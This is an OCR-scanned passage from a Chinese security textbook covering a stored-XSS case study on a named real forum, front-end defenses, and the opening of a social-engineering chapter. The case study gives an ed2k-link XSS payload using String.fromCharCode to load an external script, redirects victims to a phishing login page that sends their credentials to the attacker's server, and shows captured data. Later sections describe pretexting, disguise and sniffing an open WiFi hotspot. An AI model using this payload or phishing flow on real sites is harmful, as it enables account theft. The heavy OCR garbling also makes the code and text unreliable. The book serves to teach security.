| ` < <> $ http://wwwxxzhushou.cn/user/login.php?from=bbs 
бе 1 
шм МЗ СЪС Р 


098 - с до gre- Гіяинешало Aazam мат Әже Әлия озера ORA- > 


п през У Я ЯР? + 


es | Network | Sou 


Status 
Meth 3ta 
ethod 


red | 8825 (load: 8,815, DOMContentLoode 中 883 引 


% 
Ф в бо Q@ 100% 


图 6-47 论坛 登录 界面 图 6-48 下 载 相 关 资 料 
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然后 用 Dreamweaver 修 改 HTML 代 码 ， 改 的 时 候 注 意 考 虑 一 下 要 怎样 实施 钓鱼 ， 笔 者 
想到 了 两 种 方式 : 

(1) 清空 原 页 面 的 东西 然后 加 载 钓 鱼 页 面 的 元 素 。 

> 优点 : 地 址 栏 地 址 不 会 变 ， 仍 在 一 个 域名 下 不 容易 引起 怀疑 。 

> 缺点 : JS 的 document 没 办 法 访问 <head> 标 签 下 的 元 素 ， 所 以 我 们 要 把 载 入 CSS、 编 
码 、 载 入 JS 等 都 写 在 <body> 里 ， 而 且 如 果 原 页 面 在 <head> 里 定义 了 背景 ， 那 么 清 
空 <body> 并 重 写 ， 之 后 样式 不 太 好 做 。 

(2) XSS 后 跳 转 到 另 一 个 域 下 的 页 面 。 

> ЖЕ: 不 需要 对 源码 进行 大 改动 ， 还 原 度 高 。 

> 缺点 : 地 址 栏 里 能 看 到 跳 转 的 地 址 ， 细 心 的 人 或 了 解 安 全 技术 的 人 会 发 现 域名 不 
对 ， 会 留心 一 下 。 

在 这 里 笔者 选择 了 第 2 种 方式 。 

在 考虑 这 两 种 方法 之 前 先 看 一 下 这 个 注入 点 的 特性 。 

发 帖 的 时 候 包 含 这 侣 : 

ed2k: //|file|lovely| '+ 想 要 执行 的 JS 代码 + ' |test/ 

将 JS 代 码 写 到 加 号 中 间 就 能 XSS， 如 图 6-49 和 图 6-50 所 示 。 


ios8.3 可 以 用 叉 叉 助手 越王 么 ? 还 可 输入 41 个 字符 

Ж „кк - ФЕ “ата 
B ГОА Реф ҖӘ НЕ га ын O m) Шо 
如 题 ,ios8.3 可 以 用 又 叉 助 手 越狱 么 ? 


ed2k://|fie|lovely|'+alert(123)+'|test/ 


БЕДЕ [а= 


ios8.3 可 以 用 又 叉 助手 越狱 么 ? 


站 发 表 于 3 天 前 》 


如 题 ， ios8.3 可 以 用 义 义 助手 越狱 么 : 


юу '+alert(123)+' Bytes 


图 6-50 ”测试 结果 
但 是 中 间 插 入 的 JS 代 码 不 能 含有 各 种 引号 ， 这 样 会 闭合 | ша оввзвидянтувичвнд? 
payload 中 的 引号 导致 JS 不 能 正确 执行 ， 如 图 6-51 所 示 ， 没 有 | wav taere Bytes 


Ж. 额 额 额 求 回复 


按 F12 键 能 看 到 这 里 的 情况 。 


图 6-51 加 入 引号 
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这 个 XSS 很 鸡肋 ? Ко No No， 这 里 可 以 用 HIML 的 <scrip 伺 标签 来 测试 。 


<ЗСЕТРЕ SFC Http: 725 же e T ea 8 $ 3 L> 


可 以 看 到 这 个 方法 不 需要 使 用 引号 就 能 合法 加 载 外 部 JS 脚本 ， 但 是 直接 写 上 面 的 代码 
的 话 尖 括 号 会 被 转 义 ， 于 是 我 们 这 样 使 用 : 


ed2k://|filel|lovelyl'+document.write (String.fromCharCode (这 里 使 用 ASCII 
14)) +" |test/ 


在 String.fromCharCode 的 参数 里 填 入 原来 想 要 加 载 的 payload 的 ASCII 码 ， 比 如 <script 
src=http://.…..></scrpi 刀 这 人 句 话 的 ASCII 码 如 下 。 


БО и Ша Зе 7 1152114555 51 ш шы К, ти ш ыы; ШЖ. к ал. 
46, 46, 46, 46, 46, 46, 46, 46, 46, 46, 46, 46, 62, 60, 47,115,99,114,112,105,116, 62 
( 十 进 制 ) 


所 以 构造 代码 如 下 。 


ed2k://|file|lovelyl|'+document.write (String.fromCharCo de(60,115,99,114, 
105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,46, 46, 46,46, 46, 46, 46, 
46.46 46:46:46. 62.60, #7, 115 99 114 112. 105 116. 62) )+ ТІгезг/ 


这 样 我 们 就 没有 使 用 双 引 号 载 入 外 部 JS。 

下 面 介 绍 上 文中 两 种 方法 的 实现 过 程 。 

(1) 第 一 种 方法 。 首 先 把 HTML 中 <head> 里 加 载 的 CSS 样 式 、JS 脚 本 移 到 <body> 中 
( 拖 到 最 前 面 ， 让 它 先 加 载 ) ， 然 后 使 用 document.body.innerHTMLO 的 方式 将 <body> 标 签 
中 的 元 素 修改 为 登录 页 面 的 样式 ， 这 里 就 不 详细 介绍 了 。 

为 什么 笔者 放弃 了 这 种 方法 昵 ， 一 个 是 <body> 标 签 中 的 JS 无 法 直接 访问 <head> 标 签 
中 的 元 素 ， 所 以 不 能 删除 背景 ， 只 能 用 一 个 白色 的 层 遮 住 原来 的 页 面 。 当 然 这 只 是 一 个 问 
题 ， 还 有 一 个 问题 是 String.fromCharCode() 参 数 如 果 是 中 文 的 ASCII 码 时 可 能 会 导致 乱码 ， 
这 种 方法 的 特点 在 于 不 会 跳 转 域名 ， 所 以 不 容易 被 察觉 。 

(2) 第 二 种 方法 。 在 外 部 载 入 的 JS 中 利用 windowjlocation href-http:/… ; 的 方式 跳 转 到 自 
己 存放 钓鱼 页 面 的 地 址 〈 此 处 没有 在 payload 中 实现 ， 请 读者 思考 一 下 ， 为 什么 ? ) 。 

然后 将 钓鱼 页 面 的 HIML 修改 一 下 按钮 的 JS 代码 。 

找到 注册 侦 听 的 位 置 ， 如 图 6-52 所 示 。 执 行 这 个 函数 ， 如 图 6-53 所 示 。 


Бе анан) ана login )1 


图 6-52 ”注册 侦 听 的 位 置 Ё 6-53 ”执行 函数 
把 login 里 的 内 容 改 成 把 账号 、 密 码 输入 框 内 的 东西 并 发 送 到 目 己 的 服务 器 ， 发 送 完 了 
让 页 面 再 跳 转 到 论坛 主页 ， 让 这 次 钓鱼 不 会 被 怀疑 。 
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注意 : 跳 转 页 面 的 时 候 一 定 要 注意 ， 不 要 把 跳 转 的 代码 接站 发送， 如 果 发 送 没 有 执 
行 完 就 跳 转 是 不 会 发 出 包 的 ， 所 以 我 们 要 用 setTimeout(function, time); 的 方式 延迟 跳 
转 。 笔 者 在 一 开始 跳 转 到 钓鱼 页 面 的 时 候 还 让 它 弹 了 个 窗口 说 “登录 状态 异常 ， 请 重 
新 登录 ”， 然 后 又 传 了 cookie data refer 等 数据 (这 里 没有 用 ， 是 因为 不 在 同一 个 域 ， 这 
个 cooKkie 不 是 论坛 的 ， 不 过 读者 可 以 在 第 一 次 跳 转 前 就 顺便 发 过 来 ， 这 样 就 是 论坛 下 的 
cookie í ) 。 

然后 我 们 就 能 收 到 钓鱼 页 面 发 送 来 的 信息 了 。 

如 果 帖 子 需要 审核 ， 那 么 管理 员 打开 帖子 的 时 候 就 会 触发 XSS， 第 一 个 被 击 中 的 就 会 
是 管理 员 的 号 。 


(1) 触发 了 XSS， 如 图 6-$4 所 示 。 


图 6-54 ”触发 KSS 
(2) 跳 转 进入 了 钓鱼 页 面 ， 可 以 看 到 域名 发 生 了 变化 ， 如 图 6-55 所 示 。 
(3) 输入 用 户 名 和 密码 ， 如 图 6-56 所 示 。 


叉 叉 助手 


х) 3 Ж 4х, 17 я $ > 
БЕЗДІ ОУ Ү ч 
—Dm 


abcd123456 


图 6-55 ”钓鱼 页 面 图 6-56 ”输入 用 户 名 与 密码 
单 击 “立即 登入 ”按钮 之 后 ， 页 面 就 问 服务 端 发 送 了 账号 和 密码 并 跳 转 到 了 论坛 首 
页 ， 如 图 6-57 所 示 。 
查看 一 下 得 到 的 信息 ， 如 图 6-58 所 示 。 
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安 卓 版 下 载 iPhone 版 下 载 


论坛 首页 Уде УМ 叉烧 家 园 ”活动 专区 ”礼包 中 心 


叉 叉 新 年 有 礼 一 刀 塔 传奇 秀 截图 送 示 礼 
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图 6-57 论坛 首页 


124. 95. 126.8 | 2015-02-24 23:37:13 

Useragent: Mozilla/5.0 (Windows МТ 6.1; WOW64; Trident/T.Ü; rv:11.0) like Gecko 

Referer: |77722 2 oein. html 

DATA: U browser': U пале”: mozilla’ , version : 11.0 1, ua : Моті11а/5.0 (Windows МТ 6.1; WOW64; Түійегі/7.0; 91062; „МЕТ CLR 


2.0. 50727; ‚ МЕТ СІК 3.5. 30729; „МЕТ СІК 3.0. 30729; Media Center РС 6.0; „МЕТА. 0C; „МЕТА. ОЕ; үч:11.0) like Gecko’,’ lang’ :’ zh- 
CN, 'referrer' :’ http: “en xxzhushou. cr/thread-104504-1- 

1. htal', 'location МАРА oein, html’, toplocation’ : http:/ 
го ВА: гъст 234668: 12345634 %: 


login. html ” ’соокае’:’’, ’Чотали’ :” 


6-58 ”查看 得 到 的 信息 
如 果 不 会 写 服务 端 和 发 送 数 据 ， 可 以 参考 一 下 网 上 的 例子 ， 也 可 以 修改 XSS 探 针脚 本 
xssprobe 的 源码 (网 上 可 以 找到 〉。 
至 于 如 何 防 御 这 种 基于 钓鱼 页 面 的 攻击 ， 第 2 章 中 有 详细 说 明 ， 各 位 不 妨 市 看 新 知识 
翻 回去 再 复习 一 坎 。 


6.5 B|) 


Ма АВЕ У BU %u йн А BJ JÉ pk. a А т ВО ЛАВА T ЕНГІ, RAAR T 
“攻击 ”， 才 能 更 加 深入 地 了 解 “防御 ”， 半 葛 ， 防 御 总 是 比 攻击 困难 。 接 下 来 将 进入 防 
ШЕ ЫЕ: ШЕ ЖЕР 

防御 前 端 攻击 的 主要 角度 有 3 个 。 


1. Мер 5481 


Web 端 防御 即 在 Web 层 面 、 代 码 层面 杜绝 XSS 形 成 ， 在 编写 程序 时 应 该 谨慎 处 理 每 一 
个 最 终 会 被 输出 至 页 面 的 参数 ， 时 刻 牢 记 任何 来 自用 户 的 输入 都 可 能 是 不 可 信 的 ， 对 常规 
参数 ， 如 <、>、= 等 敏感 符号 进行 过 滤 ， 操 作 富 文本 元 素 时 ， 针 对 <script> 标 签 以 及 类 似 
onload、onerror 等 常用 JS 事 件 元 素 进 行 过 滤 ， 以 杜绝 恶意 JS 的 执行 ， 同 时 网 络 上 已 经 出 现 
了 很 多 有 效 的 、 高 质量 的 XSS 过 滤 脚 本 ， 可 以 直接 引用 。 
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2. ВР 


前 端 漏洞 不 同 于 注入 攻击 等 漏洞 ， 它 们 中 的 一 些 漏洞 〈 例 如 反射 型 XSS) 在 一 定 程度 
上 还 是 要 依靠 用 户 的 人 为 触发 ， 押 以 作为 用 户 ， 安 全 意识 也 必 不 可 少 。 

目前 主要 的 攻击 方式 是 在 看 似 可 信 的 网 站 中 插入 恶意 JS 代 码 执行 ， 和 常常 让 人 防 不 胜 
防 ， 所 以 养 成 一 个 警惕 的 上 网 习惯 非常 重要 ， 例 如 : 

(1) 不 要 轻易 打开 英名 其 妙 的 邮件 ; 

(22 不 打开 陌生 人 发 送 的 不 可 信和 链接 ; 

(3) 不 轻易 打开 被 大 量 转发 的 帖子 竣 热 闸 〈( 因 为 那 可 能 是 黑客 释放 出 的 一 个 XSS 蠕 
虫 ) 。 

总 地 来 说 ， 在 前 端 攻击 面前 用 户 可 以 保护 目 身 的 手段 少 之 又 少 ， 有 时 仍然 是 防 不 胜 
防 ， 所 以 我 们 还 是 应 当 把 期 许 的 目光 放 在 互联 网 安全 事业 的 发 展 上 ， 也 希望 读者 学 完 本 章 
可 以 理解 这 一 现状 ， 为 改善 互联 网 安全 尽 一 份 力所能及 的 力量 。 


З. 浏览 器 防御 


随 看 前 端 安全 问题 越 来 越 受 重视 ， 浏 览 器 厂商 们 也 开始 行动 起 来 ， 试 图 为 用 户 提供 更 
加 安全 的 上 网 环境 ， 正 浏览 器 的 XSS filter 和 Chrome 浏 览 器 的 XSS auditor 已 经 可 以 有 效 地 限 
制 反 射 型 XSS 攻 击 ， 如 果 读 者 是 一 个 注重 安全 的 人 ， 把 你 的 默认 浏览 器 设置 成 Chrome 将 会 
是 一 个 非常 明智 的 选择 ， 因 为 大 多 数 基 于 前 问 攻 击 的 恶意 链接 在 它 面 闻 都 可 能 束手无策 。 
也 希望 在 浏览 器 厂商 的 积极 配合 下 ， 前 端 安全 问题 在 未 来 的 几 年 内 可 以 成 为 历史 ， 让 人 们 
的 上 网 环境 在 安全 层面 上 变 得 更 加 无 懈 可 击 。 


6.6 Жо Зи 


前 端 安全 之 旅 到 这 里 就 告 一 段落 了 ， 本 章 简 要 介绍 了 HTML 语 法 和 在 页 面 中 调用 
JavaScript 的 方法 ， 并 深入 浅 出 地 介绍 了 XSS 和 CSRF 攻 击 的 作用 。 相 信 几 个 实战 案例 能 够 
帮助 读者 更 加 直观 地 理解 XSS 攻 击 ， 也 便于 感 兴 趣 的 读者 更 快 上 手 。 最 后 我 们 分 析 了 防御 
前 端 攻击 的 一 些 方法 。 

值得 一 提 的 是 ，XSS 和 CSRF 远 不 是 前 端 安全 的 全 部 ， 基 于 XML 的 XXE 攻 击 等 内 容 在 
本 章 中 都 尚未 提 到 。 安 全 领域 博大 精深 ,没有 什么 人 能 全 方面 地 掌握 所 有 技能 ， 技 在 于 
精 ， 精 在 于 勤 ， 还 希望 读者 多 加 练习 。 也 希望 通过 本 章节 了 解 攻 击 的 内 容 ， 从 而 知道 如 何 
保护 自己 的 个 人 隐私 ， 能 够 对 那些 潜在 的 威胁 防 患 于 未 然 。 
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黑客 们 往往 对 世界 有 看 目 己 一 套 独 特 的 视角 ， 当 恶意 攻击 通过 纯粹 的 计算 机 技术 手段 
无 法 达到 目的 时 ， 高 超 的 情商 将 会 取代 智商 成 为 进一步 打开 突破 口 的 利器 ， 而 研究 这 些 恶 
意 攻 击 行 为 的 安全 人 员 们 同样 会 跟 进 这 些 特 殊 且 神秘 的 手段 ， 长 此 以 往 便 形 成 了 一 套 安 全 
领域 独特 的 理论 : 社会 工程 学 (Social Engineering， 简 称 社 工 ) 。 本 章 将 带 读 者 揭 开 社 
会 工程 学 的 神秘 面纱 ， 领 略 它 的 风采 ， 同 时 介绍 一 些 社会 工程 学 环节 中 常用 的 技巧 ， 这 
些小 技巧 如 果 应 用 到 日 常生 活 中 ， 还 能 帮助 你 在 学 习 、 生 活 和 工作 中 取得 菜 些 意 想 不 到 的 
优势 。 
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说 起 社会 工程 学 ， 我 们 必须 先 将 其 与 以 研究 社会 事实 为 根基 并 帝 着 浓 浓 学 术 气 县 的 社 
会 学 加 以 区 分 ， 虽 然 两 者 的 理论 基础 都 衍生 目 人 类 社会 ， 但 作为 一 门 工程 学 科 ， 社 会 工程 
学 更 强调 对 于 每 个 个 体 和 特定 环境 下 有 限 集合 的 人 群 进行 研究 ， 妃 求实 际 应 用 的 效果 而 非 
理论 本 身 。 从 安全 人 员 的 角度 来 看 其 核心 思想 可 以 用 一 句 很 经 典 的 台词 总 结 : 一 个 安全 体 
系 中 最 薄弱 的 环节 永远 是 人 。 随 看 系统 的 不 断 完善 ， 防 御 力 度 的 不 断 增强 ，“ 人 ”这 一 环 
节 慢 慢 变 成 整个 系统 中 最 容易 被 利用 的 存在 ， 以 人 和 社会 行为 为 研究 对 象 从 而 发 现 漏 洞 并 
实现 突破 的 方案 和 技巧 ， 总 结 其 中 的 规律 并 扩展 利用 范围 ， 总 是 能 够 给 恶意 攻击 者 囊 来 意 
想不到 的 惊 豆 。 为 了 能 让 读者 对 社会 工程 学 攻击 有 一 个 更 直观 的 了 解 ， 笔 者 将 在 后 和 面 的 访 
幅 中 将 社会 工程 学 攻击 中 最 常见 的 方式 加 以 分 类 ， 并 符 插 介绍 实际 应 用 的 技巧 。 

首先 明确 几 个 要 点 。 


1. 什么 是 社会 工程 学 


在 这 门 学 问 被 称 为 社会 工程 学 之 前 ， 它 还 是 一 个 零散 的 集合 体 ， 集 合 了 心理 学 、 社 会 
学 以 及 很 多 有 关 “ 人 ”的 学 问 。 后 来 凯 文 * 米 特 尼 元 (Kevin David Mitnick) 提出 “社会 
工程 学 ”这 个 概念 ， 这 门 学 问 最 吸引 人 的 地 方 贡 过 于 它 可 以 使 人 顺从 你 的 意愿 ， 然 后 告诉 
你 想 知道 的 信息 或 是 按照 你 的 意愿 去 做 某 些 事 ， 这 确实 很 奇妙 ， 却 又 令 人 不 寒 而 栗 ， 在 安 
全 领域 的 作用 也 是 不 言 而 喻 。 


2. 社会 工程 学 是 否 只 是 一 种 欺骗 的 技巧 呢 


看 到 社会 工程 学 的 定义 ， 有 些 人 可 能 会 认为 社会 工程 学 不 就 是 一 种 骗 人 的 技巧 吗 ? 其 
实 社 会 工程 学 包括 很 多 不 同 的 形式 ， 它 的 确 是 一 种 技巧 ， 但 并 非 是 一 种 欺骗 的 技巧 。 笔 者 
曾 在 茶 计 算 机 相关 论坛 中 随机 发 放 了 100 份 关于 社会 工程 学 的 调查 问卷 ， 有 意思 的 是 ， 接 
近 七 成 的 人 认为 社会 工程 学 就 是 利用 他 人 的 好 奇 心 、 好 胜 心 甚至 同情 心 来 进行 欺骗 ， 但 实 
际 上 社会 工程 学 的 用 途 并 不 是 负面 的 ， 它 是 一 种 无 正 负 属 性 的 技艺 ， 全 看 使 用 它 的 人 来 赋 
予 它 何 种 意义 。 
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3. 社会 工程 学 离 我 们 的 生活 有 多 远 


相信 读者 应 该 能 猜 到 答案 。 没 错 ! 社会 工程 学 在 我 们 的 生活 中 无 处 不 在 。 医 生 在 询 
问 病情 的 时 候 你 已 经 赋予 了 他 “权限 ”， 他 知道 了 你 的 私人 信息 ; 销售 人 员 则 在 推销 产品 
时 ， 不 经 意 间 就 会 用 到 心理 学 等 方式 来 促使 人 们 产生 购买 茶 种 产品 的 欲望 ， 这 些 都 是 社会 
工程 学 在 生活 中 的 体现 ， 社 会 工程 学 无 处 不 在 。 


4. 为 什么 要 掌握 社会 工程 学 


正如 服务 器 安全 是 建立 在 对 服务 器 的 渗透 测试 上 一 样 ， 人 的 安全 也 要 建立 在 了 解 社会 
工程 学 之 上 ， 大 多 数 被 攻击 的 人 都 缺乏 安全 意识 ， 甚 全 根本 不 知道 社会 工程 学 为 何 物 ， 而 
攻击 者 正好 利用 这 个 bug 趁 虚 而 入 ， 进 行 攻 击 。 社 会 工程 学 可 以 让 人 们 对 社交 有 一 种 新 的 
视角 ， 增 强人 们 在 社交 方面 的 各 种 能 力 ， 了 解 并 和 擎 握 社 会 工程 学 ， 不 仅 能 帮助 人 们 防御 攻 
击 ， 还 能 给 人 们 的 社会 生活 带 来 很 大 益处 。 


5. 如 何 熟 练 掌 握 社 会 工程 学 


社会 工程 学 涉及 人 性 的 优点 与 弱点 ， 如 果 想 熟练 掌握 社会 工程 学 ， 就 需要 各 种 相关 知 
识 ， 例 如 心理 学 、 密 码 学 、 逻 辑 学 等 ， 也 必须 阅读 一 些 其 他 方面 的 相关 书籍 ， 例 如 卡耐基 
的 《人 性 的 弱点 》、Christopher Hadnagy 的 《社会 工程 一 一 安全 体系 中 的 人 性 漏洞 》 等 著 
作 。 男 外 一 定 要 有 意识 地 培养 目 己 的 换 位 思考 能 力 ， 这 种 能 力 在 社会 工程 学 中 起 看 十 分 重 
要 的 作用 。 
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社会 工程 学 讲究 逻辑 性 ， 所 以 一 套 完 备 的 流程 显得 尤为 重要 ， 接 下 来 一 起 看 看 社会 工 
程 学 所 涉及 的 知识 。 


7.2.1 信息 搜集 


“ 知 和 外 知己 ， 百 战 不 列 ”，《 和 孙子 兵 法 》 中 的 这 人 句 名 言 用 在 这 里 十 分 恰当 。 从 古代 
开始 ， 人 们 就 了 解 到 信息 情报 的 价值 ， 在 “兵力 ”相当 的 情况 下 ， 信 息 搜集 就 是 制胜 的 关 
键 。 那 么 对 于 一 次 社会 工程 学 活动 ， 基 本 流程 是 什么 ?总 的 来 说 ， 就 是 获得 尽 可 能 详细 的 
信息 情报 ， 伪 装 成 一 个 “特定 喘 份 ”， 掌 握 足 够 的 专业 术语 ， 对 事情 过 程 的 逻辑 链 进行 分 
析 预 测 ， 知 悉 和 “目标 ”接触 中 所 需要 问 的 问题 或 者 需要 操纵 的 事情 ， 突 发 事件 的 即时 应 
对 以 及 最 后 如 何 收 场 。 要 说 其 中 最 重要 的 环节 ， 必 然 是 信息 搜集 了 ， 信息 搜集 是 完成 一 
次 社会 工程 学 活动 的 基础 条 件 ， 对 信息 的 擎 握 程度 在 一 定 程度 上 直接 影响 了 社工 活动 的 
进程 。 
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至 于 如 何 进行 信息 搜集 ， 除 了 在 第 3 章 中 已 经 学 习 的 基本 信息 搜集 以 外 ， 社 交 网 络 信 
县 搜集 在 社会 工程 方面 的 应 用 更 为 广泛 。 一 个 人 在 网 络 上 总 会 留 下 痕迹 ， 而 信息 搜集 要 做 
的 就 是 找到 这 些 痕 迹 ， 并 通过 分 析 这 些 痕 迹 来 得 到 更 多 的 关于 目标 的 信息 。 姓 名 、 电 话 、 
爱好 等 信息 都 是 十 分 容易 获得 的 ， 而 利用 这 些 信息 又 可 以 获得 更 多 更 需要 的 信息 。 掌 握 更 
多 的 信息 技术 ， 对 于 信息 搜集 来 说 益处 展 多 《〈 例 如 人 们 可 以 通过 一 张 照片 的 EXIF 信 息 便 
可 以 很 方便 地 找 出 这 张 照片 拍摄 的 位 置 、 拍 摄 的 工具 等 )。 


7.2.2 巧妙 地 伪 疾 和 大 胆 地 接触 目标 


伪装 ， 跟 踪 ， 人 为 制造 “相遇 ”的 巧合 ， 高 科技 销 取 信息 ， 人 快速 逃 离 现场 。 这 看 起 来 
就 像 是 在 读 战 片 中 才 会 出 现 的 场景 ， 其 实现 代 恋战 片 情节 很 大 程度 上 参考 了 社会 工程 学 的 
理念 ， 或 者 可 以 说 ， 间 读 活 动 本 身 就 是 一 种 高 级 的 社会 工程 学 行为 。 在 社会 工程 学 攻击 者 
眼中 ， 近 距离 接触 目标 是 最 有 意思 的 环节 了 ， 现 代 科 技 尤其 是 互联 网 技术 给 “与 目标 保持 
距离 的 同时 午 取 信息 ”提供 了 完美 的 桥梁 ， 这 距离 可 以 是 $ 米 、10 米 ， 也 可 以 是 相 隅 千里 
通过 网 络 保 持 联 系 。 黑 客 通常 使 用 人 机 互动 的 方式 来 获取 信息 ， 但 有 时 主动 出 击 能 市 来 更 
好 的 效果 。 本 节 中 笔者 将 与 读者 们 分 享 更 多 的 接触 型 社会 工程 学 攻击 技巧 ， 并 针对 这 些 技 
巧 提出 防范 方案 。 


7.2.3 伪装 的 艺术 


当 社 会 工程 学 攻击 者 试图 达成 一 个 目标 时 ， 往 往 会 对 日 己 进行 一 定 的 伪装 。 这 种 伪装 
并 不 是 随意 的 ， 而 是 根据 目标 和 将 要 实施 的 行动 进行 选择 性 伪装 。 当 目标 是 一 名 教授 时 ， 
想 要 接近 他 /她 ， 攻 击 者 会 套 上 T 恤 ， 穿 上 和 牛仔裤 与 运动 鞋 ， 背 上 一 只 看 起 来 塞 满 了 书 的 休 
闲 包 ， 最 好 再 戴 上 一 副 看 起 来 文 约 约 的 眼镜 ， 以 学 生 的 身份 出 场 往往 会 是 个 好 主意 。 而 目 
标 是 一 家 公司 时 ， 送 快递 的 小 哥 套 装 则 是 更 合适 的 选择 。 相 比 神秘 复杂 的 易 容 术 ， 一 只 魔 
术 头 由 有 时 候 可 以 带 来 更 好 的 效果 ， 在 遮 住 2/3 面 部 的 情况 下 ， 带 上 帽子 会 减少 引起 注意 
的 几率 。 这 些 道具 都 非常 好 找 ， 通 过 一 个 网 上 商城 就 可 以 全 部 办 到 。 攻 击 者 给 自己 准备 多 
种 身份 的 名 卢 也 是 很 重要 的 步骤 。 

上 面 的 描述 是 现实 中 的 伪装 ， 在 外 形 和 行为 上 尽情 发 挥 和 目 己 的 想象 力 ， 有 些 人 便 能 够 
获得 无 数 种 身份 。 不 过 ， 互 联网 时 代 还 给 攻击 者 市 来 了 另 一 种 伪装 的 方式 ， 在 网 上 与 目标 
接触 时 ， 只 需要 极 少 的 努力 ， 一 些 社交 软件 账户 和 简单 的 引导 性 交流 ， 剩 下 的 步骤 便 全 部 
由 对 方 的 想象 力 完成 。 这 也 意味 着 如 何 出 现 变 得 非常 重要 。 互 联网 上 的 人 们 多 半 对 陌生 
人 有 看 很 蜗 的 警惕 性 ， 所 以 一 个 失败 的 出 场 或 者 不 断 地 角色 变更 会 导致 彻 抵 失去 对 方 的 
信任 。 

而 在 现实 中 ， 这 样 的 接触 也 是 有 看 极 局 技巧 性 的 。 人 是 群居 动物 ， 人 们 每 天 都 在 和 不 
同 的 人 接触 。 虽 然 有 着 固定 的 小 圈子 并 对 陌生 人 有 者 天 生 的 稍 持 ， 却 也 不 会 拒绝 与 那些 有 
充分 理由 出 现 的 人 交流 。 当 交流 成 为 必要 时 ， 珊 着 充足 的 理由 出 现在 目标 的 面前 绝 不 会 太 
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糟糕 ， 对 于 普通 人 而 言 ， 学 会 倾听 ， 目 信 的 交流 风格 往往 足够 带 来 一 个 恨 好 的 社交 图， 与 
意气 相投 的 人 磨合 而 成 为 朋友 不 是 一 件 困 难 的 事情 。 但 对 于 一 个 社会 工程 师 来 说 ， 接 触 是 
短暂 的 ， 所 以 一 定 要 在 最 短 的 时 间 内 把 效率 最 大 化 ， 同 时 也 出 于 保护 目 身 的 原因 ， 伪 装束 
有 了 存在 的 必要 性 ， 有 针对 性 地 将 目 己 伪装 成 一 类 人 并 用 这 个 伪装 的 身份 与 目标 交流 ， 获 
取信 息 非 党 有 效 ， 但 也 限制 了 沟通 的 次 数 和 时 间 : 在 伪装 身份 下 过 于 频 闯 地 与 目标 接触 很 
容易 引起 对 方 管 觉 或 异常 的 感受 。 

然而 ， 大 多 数 情况 下 即使 是 现实 中 出 击 的 社会 工程 学 攻击 者 并 没有 必要 把 目 己 置 于 
离 目 标 太 近 的 位 置 。 因 为 每 个 人 在 生活 中 其 实 都 在 不 停 地 传播 和 日 己 相关 的 信息 。 走 过 的 
路 ， 购 买 的 食物 ， 进 行 沟通 的 人 群 等 都 能 反映 出 目标 的 特征 。 社 会 工程 师 通 过 成 为 一 个 观 
察 者 即 可 得 到 大 量 的 信息 ， 而 互联 网 还 之 来 新 的 便利 。 个 人 通过 网 络 癌 外 传播 的 信息 量 同 
样 很 大 ， 所 以 作为 接触 者 ， 除 了 面对面 交流 和 保持 一 定 距离 的 观察 外 ， 使 监控 者 进行 主动 
攻击 也 成 为 了 可 能 ， 这 一 切 只 需要 一 个 随身 携带 的 移动 热点 ， 并 不 停 地 更 换 热 点 名 称 葡 能 
办 到 。 很 多 人 在 发 现 目 己 的 身边 有 没 设置 密码 的 无 线 热 点 时 都 会 党 不 犹 移 地 连接 进去 ， 丝 
塞 不 顾虑 洪 在 的 安全 问题 。 这 时 只 需要 在 网 关 处 进行 抓 包 《还 记得 在 无 线 安 全 章节 的 知识 
吗 ? 下 次 各 位 连接 没有 密码 的 WiFi 时 ， 可 要 注意 一 人 下) ， 即 可 获取 用 户 通过 互联 网 同 外 发 
送 以 及 同 内 接收 的 信息 ， 从 而 获得 达成 目标 的 机 会 。 

掌握 足够 多 的 专业 术语 既 能 够 让 你 的 目标 相信 你 所 扮演 的 身份 ， 也 能 让 对 话 更 和 谐 轻 
松 地 进行 下 去 。 专 业 术 语 的 必要 性 在 于 ， 对 方 了 解 你 的 身份 之 后 ， 知 道 你 了 解 对 应 的 知识 
或 者 冲 识 术语 ， 能 从 侧面 证 实 你 的 号 份 ， 使 你 的 身份 更 加 符合 你 押 希 望 扮演 的 角色 ， 并 且 
为 接 下 来 的 社工 活动 做 铺垫 。 当 然 ， 一 个 合理 的 场景 和 话题 也 同样 重要 ， 即 便 你 掌握 再 多 
的 专业 术语 ， 用 错 了 场合 ， 那 也 是 白搭 。 下 面 来 看 一 个 例子 : 如 有 果 想 通过 “单车 爱好 者 ” 
的 喘 份 接近 男 一 位 “单车 爱好 者 ”， 那 么 你 除了 掌握 单车 运动 的 各 种 专业 术语 之 外 ， 还 需 
要 和 擎 握 其 中 的 一 些 忌 讳 ， 例 如 借 车 一 一 在 爱 车 如 命 的 单车 世界 里 借 车 完全 是 外 行人 才 会 干 
的 事 。 


7.2.4 交流 的 技巧 


除了 伪装 ， 交 流 对 于 社会 工程 学 也 尤为 重要 ， 下 面 将 通过 实例 来 分 析 一 些 实 用 的 社会 
工程 学 交流 技巧 。 

很 多 人 认为 ， 人 类 和 动物 最 大 的 区 别 束 在 于 人 们 拥有 一 套 完整 而 高 级 的 语言 体系 ， 可 
以 让 每 个 个 体 间 更 好 地 相互 交流 ， 促 进 思想 的 融合 和 社会 的 进步 。 很 多 人 说 ， 交 流 是 一 门 
艺术 ， 可 事实 上 人 们 的 大 脑 往往 都 只 是 用 “会 说 话 ” 三 个 字 来 描述 这 门 “ 艺 术 ”。 那 么 交 
流 真 的 只 是 会 说 话 这 么 简单 吗 ? 当然 不 是 。 人 与 人 的 交流 是 信息 的 沟通 ， 聪 明 的 交流 艺术 
家 们 往往 会 使 用 一 套 模型 来 描述 信息 沟通 的 全 过 程 ， 这 个 模型 中 包含 了 8 个 要 素 : 信息 发 
送 方 、 传 达 的 信息 、 对 发 送信 息 的 编码 、 信 息 传 播 的 通道 《信道 ) 、 信 息 接 收 方 、 解 码 过 
程 、 信 息 传 递 过 程 中 的 杂音 和 收 到 信息 后 接收 方 对 信息 发 送 方 的 反馈 。 这 些 基 本 要 素 相 互 
之 间 的 关系 如 图 7-1 所 示 。 
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图 7-1 信息 沟通 基本 要 素 相互 关系 模型 
发 送 方 将 目 己 想 要 传达 的 信息 编码 后 通过 信道 将 信息 传达 给 接收 方 ， 而 接收 方 收 到 信 
恩 后 将 信息 解码 为 自己 可 以 理解 的 形式 ， 并 给 予 发 送 方 一 定 的 反馈 ， 在 这 个 过 程 中 ， 传 播 
中 的 噪声 将 会 影响 到 信息 传递 的 效果 从 而 间接 地 干扰 到 接收 方 的 反馈 。 
